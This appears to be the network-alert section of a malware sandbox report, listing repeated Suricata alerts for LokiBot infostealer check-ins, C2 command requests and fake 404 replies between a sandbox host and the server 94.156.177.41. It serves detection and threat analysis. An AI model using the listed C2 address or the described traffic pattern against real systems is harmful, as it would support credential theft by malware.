Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49816
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49828
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49810
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49773
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49843 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49796 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49771
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49843 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49780
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49765 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49843 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49822 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49822 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49843 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49843 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49778
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49789 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49822 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49803 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49803 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49775
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49822 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49803 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49822 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49796
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49888 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49803 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49803 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49781
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49777 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49794
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49798 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49798 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49798 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49765
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49747
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49798 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49798 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49803
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49822
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49888
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49789
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49843
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49777
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49770
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49801 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49985 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49985 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49786 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49798
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49804
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49985 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49782
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50003 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49795 -> 94.156.177.41:80
